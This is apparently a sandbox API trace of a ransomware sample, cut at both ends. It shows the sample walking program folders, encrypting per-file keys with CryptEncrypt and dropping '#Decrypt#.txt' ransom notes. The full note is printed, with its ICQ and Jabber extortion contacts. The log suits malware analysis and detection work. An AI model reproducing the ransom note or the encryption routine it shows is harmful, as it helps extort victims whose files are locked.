ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb76ca0d9, dwReserved1=0x6e466024, cFileName=".", cAlternateFileName="")) returned 0x7c68e0 [0250.924] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.924] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\.") returned 79 [0250.924] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0250.924] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb76ca0d9, dwReserved1=0x6e466024, cFileName="..", cAlternateFileName="")) returned 1 [0250.924] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.924] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\..") returned 80 [0250.924] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.924] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.924] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb76ca0d9, dwReserved1=0x6e466024, cFileName="..", cAlternateFileName="")) returned 0 [0250.924] FindClose (in: hFindFile=0x7c68e0 | out: hFindFile=0x7c68e0) returned 1 [0250.925] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\#Decrypt#.txt") returned 91 [0250.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\#decrypt#.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.925] GetProcessHeap () returned 0x780000 [0250.925] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.925] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84877a0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc84877a0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5b400, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0250.925] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="Windows") returned -1 [0250.925] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned 90 [0250.925] StrStrIW (lpFirst="MSTTSFrontendENU.dll", lpSrch=".horseleader") returned 0x0 [0250.925] lstrcmpW (lpString1="MSTTSFrontendENU.dll", lpString2="#Decrypt#.txt") returned 1 [0250.925] lstrcmpW (lpString1="MSTTSFrontendENU.dll", lpString2="_uninstalling_.png") returned 1 [0250.925] lstrlenW (lpString=".testttjffg") returned 11 [0250.926] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll", lpSrch=".testttjffg") returned 0x0 [0250.926] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.926] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.926] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.927] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c77e3, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2c77e3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 1 [0250.927] lstrcmpiW (lpString1="MSTTSLoc.dll.mui", lpString2="Windows") returned -1 [0250.927] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned 86 [0250.927] StrStrIW (lpFirst="MSTTSLoc.dll.mui", lpSrch=".horseleader") returned 0x0 [0250.927] lstrcmpW (lpString1="MSTTSLoc.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0250.927] lstrcmpW (lpString1="MSTTSLoc.dll.mui", lpString2="_uninstalling_.png") returned 1 [0250.927] lstrlenW (lpString=".testttjffg") returned 11 [0250.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui", lpSrch=".testttjffg") returned 0x0 [0250.928] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.928] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, 
pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.928] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c77e3, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2c77e3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 0 [0250.928] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.928] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\#Decrypt#.txt") returned 83 [0250.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.929] GetProcessHeap () returned 0x780000 [0250.929] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.929] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc536f5be, 
ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc536f5be, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x36fbb600, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0250.929] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="Windows") returned -1 [0250.929] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned 79 [0250.929] StrStrIW (lpFirst="MSTTSCommon.dll", lpSrch=".horseleader") returned 0x0 [0250.929] lstrcmpW (lpString1="MSTTSCommon.dll", lpString2="#Decrypt#.txt") returned 1 [0250.929] lstrcmpW (lpString1="MSTTSCommon.dll", lpString2="_uninstalling_.png") returned 1 [0250.929] lstrlenW (lpString=".testttjffg") returned 11 [0250.929] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll", lpSrch=".testttjffg") returned 0x0 [0250.930] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.930] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.930] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc982ab94, 
ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc982ab94, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3702e1f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2c400, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSEngine.dll", cAlternateFileName="")) returned 1 [0250.930] lstrcmpiW (lpString1="MSTTSEngine.dll", lpString2="Windows") returned -1 [0250.930] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned 79 [0250.930] StrStrIW (lpFirst="MSTTSEngine.dll", lpSrch=".horseleader") returned 0x0 [0250.930] lstrcmpW (lpString1="MSTTSEngine.dll", lpString2="#Decrypt#.txt") returned 1 [0250.930] lstrcmpW (lpString1="MSTTSEngine.dll", lpString2="_uninstalling_.png") returned 1 [0250.930] lstrlenW (lpString=".testttjffg") returned 11 [0250.931] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll", lpSrch=".testttjffg") returned 0x0 [0250.931] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.931] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.931] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d522f4, 
ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc6d522f4, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 1 [0250.931] lstrcmpiW (lpString1="MSTTSLoc.dll", lpString2="Windows") returned -1 [0250.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned 76 [0250.931] StrStrIW (lpFirst="MSTTSLoc.dll", lpSrch=".horseleader") returned 0x0 [0250.931] lstrcmpW (lpString1="MSTTSLoc.dll", lpString2="#Decrypt#.txt") returned 1 [0250.931] lstrcmpW (lpString1="MSTTSLoc.dll", lpString2="_uninstalling_.png") returned 1 [0250.932] lstrlenW (lpString=".testttjffg") returned 11 [0250.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll", lpSrch=".testttjffg") returned 0x0 [0250.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d522f4, 
ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc6d522f4, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 0 [0250.932] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.932] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\#Decrypt#.txt") returned 77 [0250.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.933] GetProcessHeap () returned 0x780000 [0250.933] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.933] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TTS20", cAlternateFileName="")) returned 0 [0250.933] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.933] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\#Decrypt#.txt") returned 71 [0250.933] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.934] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.934] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.936] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.936] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.936] CloseHandle (hObject=0x21c) returned 1 [0250.936] 
GetProcessHeap () returned 0x780000 [0250.936] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0250.936] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0250.936] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0250.937] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\#Decrypt#.txt") returned 61 [0250.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0250.937] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.937] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0250.939] lstrlenA (lpString="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") returned 1368 [0250.939] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0250.939] CloseHandle (hObject=0x1cc) returned 1 [0250.939] GetProcessHeap () returned 0x780000 [0250.939] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.939] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="System", cAlternateFileName="")) returned 1 [0250.939] lstrcmpiW (lpString1="System", lpString2="Windows") returned -1 [0250.939] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System") returned 40 [0250.939] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0250.939] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0250.939] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.939] GetProcessHeap () returned 0x780000 [0250.939] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.939] 
